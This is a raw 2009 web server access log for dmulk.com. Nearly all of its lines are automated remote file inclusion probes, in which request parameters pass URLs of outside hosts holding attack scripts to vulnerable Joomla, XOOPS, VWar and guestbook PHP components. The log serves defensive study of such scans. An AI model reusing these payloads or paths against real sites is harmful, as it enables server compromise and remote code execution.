206.225.23.4 - - [16/Sep/2009:11:59:32 -0700] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:59:32 -0700] "GET /logs/access_090527.log%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:59:44 -0700] "GET /logs/access_080521.log%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [16/Sep/2009:11:59:45 -0700] "GET /logs/access_080521.log%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:59:53 -0700] "GET /logs/access_080709.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:59:53 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:11:59:53 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:00:02 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:00:02 -0700] "GET /logs/access_080709.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:00:03 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:00:42 -0700] "GET /logs/access_071229.log/modules/vwar/convert/mvcw_convert.php?step=1&vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:00:42 -0700] "GET /logs/modules/vwar/convert/mvcw_convert.php?step=1&vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:00:45 -0700] "GET /modules/vwar/convert/mvcw_convert.php?step=1&vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:00:52 -0700] "GET /logs/access_071229.log%20%20/modules/vwar/convert/mvcw_convert.php?step=1&vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:00:59 -0700] "GET /logs/access_090514.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:01:09 -0700] "GET /logs/access_090514.log%20%20//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:02:00 -0700] "GET /logs/access_071031.log HTTP/1.0" 200 21492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.43.202.66 - - [16/Sep/2009:12:03:44 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.43.202.66 - - [16/Sep/2009:12:03:44 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
211.43.202.66 - - [16/Sep/2009:12:03:46 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "dmulk.com"
211.43.202.66 - - [16/Sep/2009:12:03:46 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:03:52 -0700] "GET /logs/access_080209.log%20%20/index.php?lang=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:03:58 -0700] "GET /logs/index.php?lang=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:04:01 -0700] "GET /index.php?lang=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 200 19777 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:24 -0700] "GET /logs//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:24 -0700] "GET /guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:24 -0700] "GET /guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:24 -0700] "GET /logs/access_080615.log%20%20//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:24 -0700] "GET /logs/access_080615.log//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:24 -0700] "GET /logs//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:30 -0700] "GET /guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:30 -0700] "GET /logs//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:30 -0700] "GET /logs/access_080615.log%20%20//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:31 -0700] "GET /logs//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:31 -0700] "GET /logs/access_080615.log//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:04:31 -0700] "GET /guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [16/Sep/2009:12:04:35 -0700] "GET /logs/access_090408.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://randycute.com/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:17 -0700] "GET /logs//guestbook/install.php?DB_CLASS=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:17 -0700] "GET /logs/access_080615.log//guestbook/install.php?DB_CLASS=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:17 -0700] "GET /guestbook/install.php?DB_CLASS=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:21 -0700] "GET /logs//guestbook/install.php?DB_CLASS=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:21 -0700] "GET /guestbook/install.php?DB_CLASS=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:21 -0700] "GET /logs/access_080615.log//guestbook/install.php?DB_CLASS=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:26 -0700] "GET /guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:26 -0700] "GET /logs//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:26 -0700] "GET /logs/access_080615.log//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:27 -0700] "GET /guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:27 -0700] "GET /logs//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:27 -0700] "GET /logs/access_080615.log//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:32 -0700] "GET /logs/access_090604.log%20%20//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:05:35 -0700] "GET /logs/access_090604.log%20%20//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:05:54 -0700] "GET /logs/access_080422.log//modules/vwar/admin/admin.php?vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:05:54 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.184.252.3 - - [16/Sep/2009:12:05:54 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:12:06:08 -0700] "GET /logs/access_081001.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:12:06:09 -0700] "GET /logs/access_080208.log HTTP/1.0" 200 1325284 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:06:10 -0700] "GET /logs/access_080615.log%20%20//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:06:11 -0700] "GET /logs/access_080615.log%20%20//guestbook/install.php?DB_CLASS=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:06:12 -0700] "GET /logs/access_080615.log%20%20//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:12:06:14 -0700] "GET /logs/access_080121.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:06:29 -0700] "GET /logs/access_080615.log%20%20//guestbook/install.php?DB_CLASS=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:06:39 -0700] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:06:39 -0700] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:06:40 -0700] "GET /logs/access_080318.log%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:06:46 -0700] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:06:46 -0700] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:06:46 -0700] "GET /logs/access_080318.log%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:06:48 -0700] "GET /logs/access_080211.log%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:06:53 -0700] "GET /logs/access_081007.log//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.40.39 - - [16/Sep/2009:12:06:55 -0700] "GET /logs/access_080211.log%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:07:01 -0700] "GET /logs/access_090604.log%20%20//guestbook/install.php?DB_CLASS=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:07:01 -0700] "GET /logs/access_081111.log//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:07:01 -0700] "GET /logs/access_090604.log%20%20//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:07:02 -0700] "GET /logs/access_090604.log%20%20//guestbook/install.php?DB_CLASS=http://dogstudio.net/ampoll/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.22.156 - - [16/Sep/2009:12:07:08 -0700] "GET /blog/index.php/2008/06/09/ HTTP/1.0" 200 10348 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.22.156 - - [16/Sep/2009:12:07:12 -0700] "GET /blog/wp-content/themes/defaultwide/defaultwide/style.css HTTP/1.0" 200 10083 "http://dmulk.com/blog/2008/06/09/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.22.156 - - [16/Sep/2009:12:07:16 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.0" 304 - "http://dmulk.com/blog/2008/06/09/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.22.156 - - [16/Sep/2009:12:07:18 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.0" 304 - "http://dmulk.com/blog/2008/06/09/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.225.196.53 - - [16/Sep/2009:12:07:20 -0700] "GET /logs/access_090604.log%20%20//guestbook/install.php?DB_CLASS=http://www.enus.co.kr/bbs/icon/lolid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:07:27 -0700] "GET /logs/access_081007.log//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.135.35.40 - - [16/Sep/2009:12:07:27 -0700] "GET /logs/access_081111.log//e404.php?DOCUMENT_ROOT=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:07:39 -0700] "GET /include/bbs.lib.inc.php?site_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:07:39 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:07:39 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.228.191.194 - - [16/Sep/2009:12:07:41 -0700] "GET /logs/access_080613.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://randycute.com/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:07:55 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_live_site=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:07:55 -0700] "GET /logs/access_090408.log%20%20//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_live_site=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:07:55 -0700] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_live_site=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.249.159.4 - - [16/Sep/2009:12:08:17 -0700] "GET /logs/access_081002.log%20//squirrelcart/cart_content.php?cart_isp_root=http://larrys.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
63.249.159.4 - - [16/Sep/2009:12:08:17 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://larrys.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
63.249.159.4 - - [16/Sep/2009:12:08:17 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://larrys.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:08:26 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:08:26 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:08:26 -0700] "GET /logs/access_080530.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.3.247.100 - - [16/Sep/2009:12:08:31 -0700] "GET /logs/access_080518.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.vnshomecare.org/eng/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:08:32 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:08:32 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:08:32 -0700] "GET /logs/access_090326.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:08:34 -0700] "GET /logs/access_080501.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:08:56 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_secret=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:08:56 -0700] "GET /logs/access_090408.log%20%20//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_secret=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:08:57 -0700] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_secret=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:12:09:14 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:12:09:15 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.27.95.144 - - [16/Sep/2009:12:09:15 -0700] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:09:29 -0700] "GET /logs/access_090326.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:09:31 -0700] "GET /logs/access_080501.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:12:09:58 -0700] "GET /logs/access_080304.log//main.php?x=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:12:09:58 -0700] "GET /main.php?x=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:12:09:58 -0700] "GET /logs//main.php?x=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.236.8 - - [16/Sep/2009:12:10:01 -0700] "GET /logs/access_090124.log//main.php?x=http://larrys.interfree.it/echos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:12:10:11 -0700] "GET /logs/access_090901.log%20%20//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_live_site=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.23 - - [16/Sep/2009:12:10:18 -0700] "GET /logs/access_090505.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.graveyardzombies.org//files/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
217.160.7.67 - - [16/Sep/2009:12:10:20 -0700] "GET /logs/access_080619.log%20%20//include/bbs.lib.inc.php?site_path=http://rox-crime2.no-ip.org:8080/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
